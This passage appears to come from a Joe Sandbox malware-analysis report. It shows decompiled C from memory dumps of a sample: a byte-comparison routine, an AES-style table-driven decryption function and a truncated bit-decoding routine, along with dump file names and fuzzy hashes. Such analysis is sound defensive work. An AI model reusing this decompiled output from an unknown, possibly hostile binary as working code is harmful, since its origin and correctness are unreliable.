											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}


































                                                        0x00a20596
                                                        0x00a20596
                                                        0x00a20596
                                                        0x00a2059c
                                                        0x00a20623
                                                        0x00a20625
                                                        0x00a20627
                                                        0x00a209a6
                                                        0x00a209a6
                                                        0x00a21797
                                                        0x00a21797
                                                        0x00a2062d
                                                        0x00a20633
                                                        0x00a206ba
                                                        0x00a206bc
                                                        0x00a206be
                                                        0x00000000
                                                        0x00000000
                                                        0x00a206c4
                                                        0x00a206ca
                                                        0x00a20751
                                                        0x00a20753
                                                        0x00a20755
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2075b
                                                        0x00a20761
                                                        0x00a207e8
                                                        0x00a207ea
                                                        0x00a207ec
                                                        0x00000000
                                                        0x00000000
                                                        0x00a207f8
                                                        0x00a20880
                                                        0x00a20882
                                                        0x00a20884
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2088a
                                                        0x00a20890
                                                        0x00a20917
                                                        0x00a20919
                                                        0x00a2091b
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20921
                                                        0x00a20927
                                                        0x00a2099e
                                                        0x00a209a0
                                                        0x00a209a2
                                                        0x00a209a4
                                                        0x00a209a4
                                                        0x00000000
                                                        0x00a209a2
                                                        0x00a20930
                                                        0x00a20932
                                                        0x00a20946
                                                        0x00a2094e
                                                        0x00a20950
                                                        0x00a20964
                                                        0x00a2096c
                                                        0x00a2096e
                                                        0x00a20982
                                                        0x00a2098a
                                                        0x00a2098c
                                                        0x00a20995
                                                        0x00a20995
                                                        0x00000000
                                                        0x00a2098c
                                                        0x00a20977
                                                        0x00a20980
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20980
                                                        0x00a20959
                                                        0x00a20962
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20962
                                                        0x00a2093b
                                                        0x00a20944
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20944
                                                        0x00a2089d
                                                        0x00a2089f
                                                        0x00a208b7
                                                        0x00a208bf
                                                        0x00a208c1
                                                        0x00a208d9
                                                        0x00a208e1
                                                        0x00a208e3
                                                        0x00a208fb
                                                        0x00a20903
                                                        0x00a20905
                                                        0x00a2090e
                                                        0x00a2090e
                                                        0x00000000
                                                        0x00a20905
                                                        0x00a208ec
                                                        0x00a208f5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a208f5
                                                        0x00a208ca
                                                        0x00a208d3
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a208d3
                                                        0x00a208a8
                                                        0x00a208b1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a208b1
                                                        0x00a20806
                                                        0x00a20808
                                                        0x00a20820
                                                        0x00a20828
                                                        0x00a2082a
                                                        0x00a20842
                                                        0x00a2084a
                                                        0x00a2084c
                                                        0x00a20864
                                                        0x00a2086c
                                                        0x00a2086e
                                                        0x00a20877
                                                        0x00a20877
                                                        0x00000000
                                                        0x00a2086e
                                                        0x00a20855
                                                        0x00a2085e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2085e
                                                        0x00a20833
                                                        0x00a2083c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2083c
                                                        0x00a20811
                                                        0x00a2081a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2081a
                                                        0x00a2076e
                                                        0x00a20770
                                                        0x00a20788
                                                        0x00a20790
                                                        0x00a20792
                                                        0x00a207aa
                                                        0x00a207b2
                                                        0x00a207b4
                                                        0x00a207cc
                                                        0x00a207d4
                                                        0x00a207d6
                                                        0x00a207df
                                                        0x00a207df
                                                        0x00000000
                                                        0x00a207d6
                                                        0x00a207bd
                                                        0x00a207c6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a207c6
                                                        0x00a2079b
                                                        0x00a207a4
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a207a4
                                                        0x00a20779
                                                        0x00a20782
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20782
                                                        0x00a206d7
                                                        0x00a206d9
                                                        0x00a206f1
                                                        0x00a206f9
                                                        0x00a206fb
                                                        0x00a20713
                                                        0x00a2071b
                                                        0x00a2071d
                                                        0x00a20735
                                                        0x00a2073d
                                                        0x00a2073f
                                                        0x00a20748
                                                        0x00a20748
                                                        0x00000000
                                                        0x00a2073f
                                                        0x00a20726
                                                        0x00a2072f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2072f
                                                        0x00a20704
                                                        0x00a2070d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2070d
                                                        0x00a206e2
                                                        0x00a206eb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a206eb
                                                        0x00a20640
                                                        0x00a20642
                                                        0x00a2065a
                                                        0x00a20662
                                                        0x00a20664
                                                        0x00a2067c
                                                        0x00a20684
                                                        0x00a20686
                                                        0x00a2069e
                                                        0x00a206a6
                                                        0x00a206a8
                                                        0x00a206b1
                                                        0x00a206b1
                                                        0x00000000
                                                        0x00a206a8
                                                        0x00a2068f
                                                        0x00a20698
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20698
                                                        0x00a2066d
                                                        0x00a20676
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20676
                                                        0x00a2064b
                                                        0x00a20654
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20654
                                                        0x00a205a9
                                                        0x00a205ab
                                                        0x00a205c3
                                                        0x00a205cb
                                                        0x00a205cd
                                                        0x00a205e5
                                                        0x00a205ed
                                                        0x00a205ef
                                                        0x00a20607
                                                        0x00a2060f
                                                        0x00a20611
                                                        0x00a2061a
                                                        0x00a2061a
                                                        0x00000000
                                                        0x00a20611
                                                        0x00a205f8
                                                        0x00a20601
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a20601
                                                        0x00a205d6
                                                        0x00a205df
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a205df
                                                        0x00a205b4
                                                        0x00a205bd
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction ID: c44a11eaa4f2d580af7417a1b21c1c6d23b7db9b0610b43e051232a2987414fb
                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction Fuzzy Hash: 06C16D322051A30AEB2D473DA57483FBAA15AE27B131A077DD4F7CB1DBFE20D5649620
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0E57B Relevance: .3, Instructions: 318COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A0E57B(void* __ebx, intOrPtr __ecx, void* __esi) {
				void* _t222;
				intOrPtr _t229;
				signed char _t253;
				signed int _t301;
				signed int* _t304;
				signed int* _t309;
				unsigned int _t313;
				signed char _t348;
				unsigned int _t350;
				signed int _t353;
				unsigned int _t356;
				signed int* _t359;
				signed int _t363;
				signed int _t368;
				signed int _t372;
				signed int _t376;
				signed char _t378;
				signed int* _t382;
				signed int _t388;
				signed int _t394;
				signed int _t399;
				intOrPtr _t400;
				signed char _t402;
				signed char _t403;
				signed char _t404;
				unsigned int _t406;
				signed int _t409;
				signed int _t411;
				unsigned int _t412;
				unsigned int _t414;
				unsigned int _t415;
				signed int _t416;
				signed int _t421;
				void* _t422;
				unsigned int _t423;
				unsigned int _t424;
				signed int _t426;
				intOrPtr _t429;
				signed int* _t430;
				void* _t431;
				void* _t432;

				_t414 =  *(_t431 + 0x6c);
				_t429 = __ecx;
				 *((intOrPtr*)(_t431 + 0x24)) = __ecx;
				if(_t414 != 0) {
					_t415 = _t414 >> 4;
					 *(_t431 + 0x6c) = _t415;
					if( *((char*)(__ecx)) == 0) {
						 *((intOrPtr*)(_t431 + 0x38)) = __ecx + 8;
						E00A1F750(_t431 + 0x5c, __ecx + 8, 0x10);
						_t432 = _t431 + 0xc;
						if(_t415 == 0) {
							L13:
							return E00A1F750( *((intOrPtr*)(_t432 + 0x38)), _t432 + 0x58, 0x10);
						}
						_t399 =  *(_t432 + 0x68);
						 *(_t432 + 0x24) = _t399 + 8;
						_t229 =  *((intOrPtr*)(_t432 + 0x78));
						_t400 = _t399 - _t229;
						 *((intOrPtr*)(_t432 + 0x34)) = _t400;
						_t359 = _t229 + 8;
						 *(_t432 + 0x28) = _t359;
						do {
							_t421 =  *(_t429 + 4);
							 *(_t432 + 0x30) = _t359 + _t400 + 0xfffffff8;
							E00A0E549(_t432 + 0x54, _t359 + _t400 + 0xfffffff8, (_t421 << 4) + 0x18 + _t429);
							_t402 =  *(_t432 + 0x4c);
							 *(_t432 + 0x10) =  *(0xa461c0 + (_t402 & 0x000000ff) * 4) ^  *(0xa46dc0 + ( *(_t432 + 0x53) & 0x000000ff) * 4) ^  *(0xa469c0 + ( *(_t432 + 0x56) & 0x000000ff) * 4);
							_t348 =  *(_t432 + 0x58);
							_t363 =  *(_t432 + 0x10) ^  *(0xa465c0 + (_t348 & 0x000000ff) * 4);
							 *(_t432 + 0x10) = _t363;
							 *(_t432 + 0x3c) = _t363;
							_t403 =  *(_t432 + 0x50);
							_t368 =  *(0xa465c0 + (_t402 & 0x000000ff) * 4) ^  *(0xa461c0 + (_t403 & 0x000000ff) * 4) ^  *(0xa46dc0 + ( *(_t432 + 0x57) & 0x000000ff) * 4) ^  *(0xa469c0 + ( *(_t432 + 0x5a) & 0x000000ff) * 4);
							 *(_t432 + 0x14) = _t368;
							 *(_t432 + 0x40) = _t368;
							_t404 =  *(_t432 + 0x54);
							 *(_t432 + 0x18) =  *(0xa469c0 + ( *(_t432 + 0x4e) & 0x000000ff) * 4) ^  *(0xa465c0 + (_t403 & 0x000000ff) * 4);
							_t372 =  *(_t432 + 0x18) ^  *(0xa461c0 + (_t404 & 0x000000ff) * 4) ^  *(0xa46dc0 + ( *(_t432 + 0x5b) & 0x000000ff) * 4);
							 *(_t432 + 0x18) = _t372;
							 *(_t432 + 0x44) = _t372;
							 *(_t432 + 0x1c) =  *(0xa46dc0 + ( *(_t432 + 0x4f) & 0x000000ff) * 4) ^  *(0xa469c0 + ( *(_t432 + 0x52) & 0x000000ff) * 4);
							_t376 =  *(_t432 + 0x1c) ^  *(0xa465c0 + (_t404 & 0x000000ff) * 4) ^  *(0xa461c0 + (_t348 & 0x000000ff) * 4);
							_t422 = _t421 - 1;
							 *(_t432 + 0x1c) = _t376;
							 *(_t432 + 0x48) = _t376;
							if(_t422 <= 1) {
								goto L9;
							}
							_t416 =  *(_t432 + 0x10);
							_t309 = (_t422 + 2 << 4) + _t429;
							 *(_t432 + 0x1c) = _t309;
							_t430 = _t309;
							 *(_t432 + 0x20) = _t422 - 1;
							do {
								_t411 =  *_t430;
								 *(_t432 + 0x10) =  *(_t430 - 8) ^ _t416;
								_t430 = _t430 - 0x10;
								_t313 = _t430[5] ^ _t376;
								_t412 = _t411 ^  *(_t432 + 0x18);
								 *(_t432 + 0x1c) = _t313;
								_t356 = _t430[3] ^  *(_t432 + 0x14);
								_t416 =  *(0xa465c0 + (_t313 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa469c0 + (_t412 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa46dc0 + (_t356 >> 0x18) * 4) ^  *(0xa461c0 + ( *(_t432 + 0x10) & 0x000000ff) * 4);
								 *(_t432 + 0x3c) = _t416;
								 *(_t432 + 0x14) =  *(0xa469c0 + ( *(_t432 + 0x1c) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa46dc0 + (_t412 >> 0x18) * 4);
								_t388 =  *(_t432 + 0x14) ^  *(0xa465c0 + ( *(_t432 + 0x10) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa461c0 + (_t356 & 0x000000ff) * 4);
								 *(_t432 + 0x14) = _t388;
								 *(_t432 + 0x40) = _t388;
								_t394 =  *(0xa46dc0 + ( *(_t432 + 0x1c) >> 0x18) * 4) ^  *(0xa465c0 + (_t356 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa469c0 + ( *(_t432 + 0x10) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa461c0 + (_t412 & 0x000000ff) * 4);
								 *(_t432 + 0x18) = _t394;
								 *(_t432 + 0x44) = _t394;
								_t376 =  *(0xa465c0 + (_t412 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xa469c0 + (_t356 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa46dc0 + ( *(_t432 + 0x10) >> 0x18) * 4) ^  *(0xa461c0 + ( *(_t432 + 0x1c) & 0x000000ff) * 4);
								_t135 = _t432 + 0x20;
								 *_t135 =  *(_t432 + 0x20) - 1;
								 *(_t432 + 0x48) = _t376;
							} while ( *_t135 != 0);
							_t429 =  *((intOrPtr*)(_t432 + 0x2c));
							 *(_t432 + 0x10) = _t416;
							_t415 =  *(_t432 + 0x74);
							 *(_t432 + 0x1c) = _t376;
							L9:
							_t253 =  *(_t429 + 0x28) ^  *(_t432 + 0x10);
							 *(_t432 + 0x20) = _t253;
							 *(_t432 + 0x4c) = _t253;
							_t378 =  *(_t429 + 0x34) ^  *(_t432 + 0x1c);
							 *(_t432 + 0x3c) =  *((intOrPtr*)((_t253 & 0x000000ff) + 0xa450a0));
							_t406 =  *(_t429 + 0x30) ^  *(_t432 + 0x18);
							_t350 =  *(_t429 + 0x2c) ^  *(_t432 + 0x14);
							 *((char*)(_t432 + 0x3d)) =  *((intOrPtr*)((_t378 >> 0x00000008 & 0x000000ff) + 0xa450a0));
							_t423 =  *(_t432 + 0x20);
							 *(_t432 + 0x54) = _t406;
							 *(_t432 + 0x50) = _t350;
							 *((char*)(_t432 + 0x3e)) =  *((intOrPtr*)((_t406 >> 0x00000010 & 0x000000ff) + 0xa450a0));
							 *(_t432 + 0x58) = _t378;
							 *((char*)(_t432 + 0x3f)) =  *((intOrPtr*)((_t350 >> 0x18) + 0xa450a0));
							 *(_t432 + 0x40) =  *((intOrPtr*)((_t350 & 0x000000ff) + 0xa450a0));
							 *((char*)(_t432 + 0x41)) =  *((intOrPtr*)((_t423 >> 0x00000008 & 0x000000ff) + 0xa450a0));
							 *((char*)(_t432 + 0x42)) =  *((intOrPtr*)((_t378 >> 0x00000010 & 0x000000ff) + 0xa450a0));
							 *((char*)(_t432 + 0x43)) =  *((intOrPtr*)((_t406 >> 0x18) + 0xa450a0));
							 *(_t432 + 0x44) =  *((intOrPtr*)((_t406 & 0x000000ff) + 0xa450a0));
							 *((char*)(_t432 + 0x45)) =  *((intOrPtr*)((_t350 >> 0x00000008 & 0x000000ff) + 0xa450a0));
							_t424 = _t423 >> 0x18;
							 *((char*)(_t432 + 0x46)) =  *((intOrPtr*)((_t423 >> 0x00000010 & 0x000000ff) + 0xa450a0));
							 *((char*)(_t432 + 0x47)) =  *((intOrPtr*)((_t378 >> 0x18) + 0xa450a0));
							 *(_t432 + 0x48) =  *((intOrPtr*)((_t378 & 0x000000ff) + 0xa450a0));
							_t409 =  *(_t432 + 0x3c) ^  *(_t429 + 0x18);
							 *((char*)(_t432 + 0x49)) =  *((intOrPtr*)((_t406 >> 0x00000008 & 0x000000ff) + 0xa450a0));
							 *((char*)(_t432 + 0x4a)) =  *((intOrPtr*)((_t350 >> 0x00000010 & 0x000000ff) + 0xa450a0));
							_t188 = _t424 + 0xa450a0; // 0x30d56a09
							 *((char*)(_t432 + 0x4b)) =  *_t188;
							_t301 =  *(_t432 + 0x48) ^  *(_t429 + 0x24);
							_t426 =  *(_t432 + 0x40) ^  *(_t429 + 0x1c);
							_t353 =  *(_t432 + 0x44) ^  *(_t429 + 0x20);
							 *(_t432 + 0x20) = _t301;
							if( *((char*)(_t429 + 1)) != 0) {
								_t409 = _t409 ^  *(_t432 + 0x5c);
								_t426 = _t426 ^  *(_t432 + 0x60);
								_t353 = _t353 ^  *(_t432 + 0x64);
								 *(_t432 + 0x20) = _t301 ^  *(_t432 + 0x68);
							}
							 *(_t432 + 0x5c) =  *( *(_t432 + 0x30));
							_t304 =  *(_t432 + 0x24);
							 *(_t432 + 0x60) =  *(_t304 - 4);
							 *(_t432 + 0x64) =  *_t304;
							 *(_t432 + 0x68) = _t304[1];
							_t382 =  *(_t432 + 0x28);
							 *(_t432 + 0x24) =  &(_t304[4]);
							 *(_t382 - 8) = _t409;
							_t382[1] =  *(_t432 + 0x20);
							_t400 =  *((intOrPtr*)(_t432 + 0x34));
							 *(_t382 - 4) = _t426;
							 *_t382 = _t353;
							_t359 =  &(_t382[4]);
							_t415 = _t415 - 1;
							 *(_t432 + 0x28) = _t359;
							 *(_t432 + 0x74) = _t415;
						} while (_t415 != 0);
						goto L13;
					}
					return E00A0EA3D( *((intOrPtr*)(_t431 + 0x70)), _t415,  *((intOrPtr*)(_t431 + 0x70)));
				}
				return _t222;
			}












































                                                        0x00a0e580
                                                        0x00a0e584
                                                        0x00a0e586
                                                        0x00a0e58c
                                                        0x00a0e592
                                                        0x00a0e599
                                                        0x00a0e59d
                                                        0x00a0e5b8
                                                        0x00a0e5c1
                                                        0x00a0e5c6
                                                        0x00a0e5cb
                                                        0x00a0ea22
                                                        0x00000000
                                                        0x00a0ea32
                                                        0x00a0e5d1
                                                        0x00a0e5da
                                                        0x00a0e5de
                                                        0x00a0e5e2
                                                        0x00a0e5e4
                                                        0x00a0e5e8
                                                        0x00a0e5eb
                                                        0x00a0e5ef
                                                        0x00a0e5ef
                                                        0x00a0e5ff
                                                        0x00a0e60c
                                                        0x00a0e611
                                                        0x00a0e637
                                                        0x00a0e63b
                                                        0x00a0e646
                                                        0x00a0e64d
                                                        0x00a0e651
                                                        0x00a0e658
                                                        0x00a0e67e
                                                        0x00a0e68a
                                                        0x00a0e68e
                                                        0x00a0e69c
                                                        0x00a0e6a7
                                                        0x00a0e6be
                                                        0x00a0e6ca
                                                        0x00a0e6ce
                                                        0x00a0e6e5
                                                        0x00a0e6fa
                                                        0x00a0e701
                                                        0x00a0e702
                                                        0x00a0e706
                                                        0x00a0e70d
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0e713
                                                        0x00a0e71d
                                                        0x00a0e720
                                                        0x00a0e724
                                                        0x00a0e726
                                                        0x00a0e72a
                                                        0x00a0e72f
                                                        0x00a0e732
                                                        0x00a0e736
                                                        0x00a0e73c
                                                        0x00a0e73e
                                                        0x00a0e742
                                                        0x00a0e751
                                                        0x00a0e781
                                                        0x00a0e792
                                                        0x00a0e7a4
                                                        0x00a0e7c0
                                                        0x00a0e7c9
                                                        0x00a0e7cd
                                                        0x00a0e806
                                                        0x00a0e80d
                                                        0x00a0e811
                                                        0x00a0e83e
                                                        0x00a0e845
                                                        0x00a0e845
                                                        0x00a0e84a
                                                        0x00a0e84a
                                                        0x00a0e854
                                                        0x00a0e858
                                                        0x00a0e85c
                                                        0x00a0e860
                                                        0x00a0e864
                                                        0x00a0e867
                                                        0x00a0e86b
                                                        0x00a0e86f
                                                        0x00a0e879
                                                        0x00a0e886
                                                        0x00a0e892
                                                        0x00a0e899
                                                        0x00a0e8a3
                                                        0x00a0e8af
                                                        0x00a0e8b3
                                                        0x00a0e8b7
                                                        0x00a0e8c1
                                                        0x00a0e8ca
                                                        0x00a0e8d4
                                                        0x00a0e8e1
                                                        0x00a0e8f3
                                                        0x00a0e905
                                                        0x00a0e914
                                                        0x00a0e924
                                                        0x00a0e939
                                                        0x00a0e945
                                                        0x00a0e94e
                                                        0x00a0e95d
                                                        0x00a0e96a
                                                        0x00a0e975
                                                        0x00a0e97e
                                                        0x00a0e98b
                                                        0x00a0e98f
                                                        0x00a0e995
                                                        0x00a0e9a5
                                                        0x00a0e9a8
                                                        0x00a0e9ab
                                                        0x00a0e9b2
                                                        0x00a0e9b6
                                                        0x00a0e9b8
                                                        0x00a0e9bc
                                                        0x00a0e9c0
                                                        0x00a0e9c8
                                                        0x00a0e9c8
                                                        0x00a0e9d2
                                                        0x00a0e9d6
                                                        0x00a0e9dd
                                                        0x00a0e9e3
                                                        0x00a0e9ed
                                                        0x00a0e9f1
                                                        0x00a0e9f5
                                                        0x00a0e9f9
                                                        0x00a0ea00
                                                        0x00a0ea03
                                                        0x00a0ea07
                                                        0x00a0ea0a
                                                        0x00a0ea0c
                                                        0x00a0ea0f
                                                        0x00a0ea12
                                                        0x00a0ea16
                                                        0x00a0ea16
                                                        0x00000000
                                                        0x00a0ea21
                                                        0x00000000
                                                        0x00a0e5a8
                                                        0x00a0ea3a

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 00c9eb8df5d71caa335a45e47901dc6534c3c4d667efa89dbcd3cdf896edeb01
                                                        • Instruction ID: ce84b3b8436a78e3d0e6a4c7514934d81370a32e1688619c9c619b1b5c0bbb95
                                                        • Opcode Fuzzy Hash: 00c9eb8df5d71caa335a45e47901dc6534c3c4d667efa89dbcd3cdf896edeb01
                                                        • Instruction Fuzzy Hash: 6DE115789183848FC304CF69D89096ABBF0BBDA300F85495EF5D597352C336EA19DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A13C7D Relevance: .3, Instructions: 263COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 78%
                                                        			E00A13C7D(void* __ecx, void* __edx) {
				void* __edi;
				signed int _t82;
				signed int _t88;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				signed int _t99;
				intOrPtr _t116;
				signed int _t127;
				void* _t135;
				signed int _t137;
				signed int _t138;
				signed int _t148;
				signed int _t150;
				void* _t152;
				signed int _t155;
				signed int _t156;
				intOrPtr* _t157;
				intOrPtr* _t166;
				signed int _t169;
				void* _t170;
				signed int _t173;
				void* _t178;
				unsigned int _t180;
				signed int _t183;
				intOrPtr* _t184;
				void* _t185;
				signed int _t187;
				signed int _t188;
				intOrPtr* _t189;
				signed int _t192;
				signed int _t198;
				void* _t201;

				_t178 = __edx;
				_t185 = __ecx;
				_t184 = __ecx + 4;
				if( *_t184 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
					L2:
					E00A0A9D7(_t184,  ~( *(_t185 + 8)) & 0x00000007);
					_t82 = E00A0A9EE(_t184);
					_t205 = _t82 & 0x00008000;
					if((_t82 & 0x00008000) == 0) {
						_t137 = 0;
						 *((intOrPtr*)(_t185 + 0xe65c)) = 0;
						 *((intOrPtr*)(_t185 + 0x98d0)) = 0;
						 *((intOrPtr*)(_t185 + 0x98d4)) = 0;
						__eflags = _t82 & 0x00004000;
						if((_t82 & 0x00004000) == 0) {
							E00A1F5F0(_t184, _t185 + 0xe4c8, 0, 0x194);
							_t201 = _t201 + 0xc;
						}
						E00A0A9D7(_t184, 2);
						do {
							 *(_t201 + 0x14) = E00A0A9EE(_t184) >> 0x0000000c & 0x000000ff;
							E00A0A9D7(_t184, 4);
							_t88 =  *(_t201 + 0x10);
							__eflags = _t88 - 0xf;
							if(_t88 != 0xf) {
								 *(_t201 + _t137 + 0x14) = _t88;
